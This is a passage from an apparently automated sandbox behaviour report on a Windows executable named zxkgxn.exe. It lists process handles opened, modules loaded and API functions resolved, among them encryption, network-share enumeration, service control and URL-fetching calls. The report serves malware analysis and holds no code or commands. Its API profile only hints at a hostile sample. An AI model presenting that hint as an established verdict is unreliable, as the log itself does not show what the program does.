Open	c:\windows\system32\conhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft analysis services\freelance.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\uninstall information\rooms-larger-grocery.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows sidebar\serial_sacrifice_resolve.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\dvd maker\potatoes penalties honduras.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\mobsync.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (318)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x76c20000	3	Fn
Load	RPCRT4.dll	base_address = 0x75ee0000	1	Fn
Load	MPR.dll	base_address = 0x74b50000	1	Fn
Load	WININET.dll	base_address = 0x753d0000	1	Fn
Load	WINMM.dll	base_address = 0x74b10000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75340000	1	Fn
Load	KERNEL32.dll	base_address = 0x76c20000	1	Fn
Load	USER32.dll	base_address = 0x74f40000	1	Fn
Load	ADVAPI32.dll	base_address = 0x74d40000	1	Fn
Load	SHELL32.dll	base_address = 0x75fd0000	1	Fn
Load	ole32.dll	base_address = 0x755e0000	1	Fn
Load	OLEAUT32.dll	base_address = 0x75220000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x74af0000	1	Fn
Load	WS2_32.dll	base_address = 0x75bc0000	1	Fn
Load	DNSAPI.dll	base_address = 0x74a90000	1	Fn
Load	CRYPT32.dll	base_address = 0x759b0000	1	Fn
Load	msvcr100.dll	base_address = 0x749d0000	1	Fn
Load	Psapi.dll	base_address = 0x75140000	1	Fn
Load	Shell32.dll	base_address = 0x75fd0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x76c20000	2	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\zxkgxn.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\zxkgxn.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x76c34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x76c3359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x76c31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x76c34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x76c34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x76cb410b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x76cb4195	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x76c3d31f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x76c4ee7e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7717441c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x7719c381	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x76c4f088	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x771805d7	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x7719ca24	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77150b8c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x771a1e1d	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x76cb4761	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x76cacd11	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x76cb424f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x76cb46b1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x76cc6676	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x76cb4751	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x76cc65f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x76cb47c1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x76cb47e1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x76cb47f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x76c4eee0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x76c349d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x76c31856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x76c3435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x76c3186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x76c33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x76c4d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x76c37a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x76c31b00	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x75f01635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x75f21ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x75f5d918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x75f23fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x75eff48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x74b52dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x74b52f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x74b53058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x753eab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x7544be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x753eb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x754130f1	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x753f5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x753ff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x753f9197	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x74b126e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7535a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x7535bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75353248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x753545bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x753581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x7534d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x7537ad1a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x76c3110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x76c33587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x76c35223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x76c353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x76c34435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x76c317d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x76c35a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x76c334c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x76c3103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x76c4c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x76c34259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x76c31136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x76c35371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x76c31282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x76c4ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x76c31986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x76c3588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x76c35063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x76c3170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x76c3492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x76c310ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x76c5830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x76c34620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x76c5d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x76c31072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x76c33ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x76c33f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x76c52b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x76c333a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x76c35929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x76c3192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x76c31700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x76c3469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetShortPathNameA, address_out = 0x76c5594d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x76c359e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x76c311c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x76c311a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x76c31222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x76c49af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x76c34442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x76c58baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x76c3168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x76c3183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x76c314b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x76c5896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x76c5828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x76c34c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x76cb4691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x76c5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x76c31410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x76c389b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x76c32d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x76c53102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileA, address_out = 0x76c35444	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x76c52a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x76c4cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x76c334b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x76c3dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x76c4174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x76c34950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x76c35558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x76c34467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x76c5d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x76c334d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x76c314fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x76c311e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x76c349ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x76c387c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x76c5772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x76c351cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x76c351e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x76c311f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x76c31725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x76c34d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x771645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x76c3465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x76c358a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x76c31946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77163002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x76c3495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7715e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x76c33c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x76c4ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x76c33da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x76cb425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x76c534d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x76c4f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x76c33bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x76c317b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x76cd7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x76c31328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77171f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x76cb454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x76c4ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x76c351b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x76c33531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x76c34a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x76c57aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadConsoleW, address_out = 0x76cd739a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x76c5d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x76c38a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x76c5d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77152270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x771522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x76cb40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x76c314e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x76c31450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x76c317ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x76c35189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x76c314c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x76c3e331	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77170fcb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77169d35	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x76c33509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x76c31809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x76c4ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x76c5d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x76c3179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x76c34493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x76c35235	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x76c354ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76c34a5d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x74f588f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x74f57809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x74f5b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x74f60dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x74f57136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x74f58a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x74f63559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x771625dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x74f605ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x74f58bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x74fafd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x74f5787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x74f59abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x74f59a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x74f59679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x74f578e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x74d4df7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x74d4df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x74d4ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x74d4ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x74d4e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x74d5157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x74d4df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x74d514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x74d5469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x74d4df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x74d67144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x74d5468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x74d4df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x74d6779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x74d4c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x74d52a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x74d546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x74d5369c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760617bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7605e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fe9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76217078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75ff1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x755fb636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75607259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x756286d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75629d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7522fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x75224642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x75223eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x75223ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x75223e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x75223f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x75225dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x75224af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x74af9263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x75bcb131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x75bc311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x75bd7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x74aa572c	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x74a9436b	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryA, address_out = 0x759e5d77	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x749ec544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x75141544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x75141408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x7514152c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76055708	1	Fn

System (256)

Operation	Additional Information	Count	Logfile
